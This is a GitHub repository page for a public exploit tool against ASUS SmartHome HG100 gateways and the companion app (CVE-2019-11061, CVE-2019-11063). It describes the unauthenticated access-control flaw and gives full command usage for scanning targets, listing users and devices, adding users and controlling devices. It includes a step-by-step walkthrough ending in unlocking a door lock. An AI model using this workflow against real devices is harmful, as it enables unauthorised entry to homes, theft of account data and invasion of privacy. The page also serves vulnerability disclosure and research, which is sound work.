Skip to content
/ ASUS-SmartHome-Exploit Public

ASUS SmartHome Exploit for CVE-2019-11061 and CVE-2019-11063

24 stars 7 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

tim124058/ASUS-SmartHome-Exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
images
images
 
 
.gitignore
.gitignore
 
 
DeviceInfo.py
DeviceInfo.py
 
 
README.md
README.md
 
 
SmartHomeExploit.py
SmartHomeExploit.py
 
 
__init__.py
__init__.py
 
 
exploit.py
exploit.py
 
 

Repository files navigation

ASUS-SmartHome-Exploit

CVE IDs

CVE-2019-11061 : Broken access control in HG100

Affected products : ASUS SmartHome Gateway HG100 Firmware version < 4.00.09

CVE-2019-11063 : Broken access control in SmartHome app

Affected products : ASUS SmartHome Android APP version < 3.0.45_190701

Description

If the attacker is on the same internal network as the HG100 or a mobile device with the companion APP(android or iPhone). The attacker can send control requests to them.

The attacker then does not need any authentication to do the following:
1. Get all user names that have been added to the HG100.
2. Get all devices information under the SmartHome Gateway(HG100).
3. Control all controllable devices (e.g. DoorLock, Meter Plug ...) under the SmartHome Gateway.
The following need password (4 to 6 digits, default: "0000") :
1. Add users to HG100.

Exploit usage:

scan exploitable port :

usage: exploit.py scan [-h] [-v] target_ip

scan exploitable port

positional arguments:
  target_ip   scan ip

optional arguments:
  -h, --help  show this help message and exit
  -v          show account email list

send command to target :

usage: exploit.py cmd [-h]
                      (-u | -l | -s device_id | -c device_id status | -a username)
                      [--user username] [--new-user username] [-v]
                      target

send command to target

positional arguments:
  target                <target-ip>:<port>

optional arguments:
  -h, --help            show this help message and exit
  -u, --list-user       list all user in device
  -l, --list-device     list all device status
  -s device_id, --device-status device_id
                        list device status
  -c device_id status, --device-control device_id status
                        control device status
  -a username, --add-user username
                        add a user to device
  --user username       assign user for cmd
  --new-user username   create a new user for cmd
  -v                    show account email list

Note: 2019/5/15 - ASUS release update for SmartHome APP(3.0.42_190515) and Gateway(4.00.06). And added SSL to HTTP service. But this vulnerability still exists. For this update, you need to specify protocal when using the "cmd" argument. For example: 
$ ./exploit.py cmd https://10.42.50.166:8083 -l

Use example:

Step1:

Scan mobile device (installed the companion APP for android or iPhone) exploitable port :
app port P.S. The -v option will list the users that have been added to the HG100.

or

Scan HG100 exploitable port :
HG100 port

Step2:

Get all user that have been added to the HG100: list user

or add a new one: add user

Note: use https://10.42.50.166:8083 for "cmd" argument.
For example:

$ ./exploit.py cmd https://10.42.50.166:8083 -u

Step3:

Get all devices information under the SmartHome Gateway: list device P.S. If the --user option is not set, the first user in HG100 will be selected automatically. (Because no password is needed)

Compare with app:


Step4:

Control (unlock) the DoorLock. ctrl device P.S. the value 1028 get from -l option(step3).

Result:

About

ASUS SmartHome Exploit for CVE-2019-11061 and CVE-2019-11063

Resources

Readme
Activity

Stars

24 stars

Watchers

2 watching

Forks

7 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages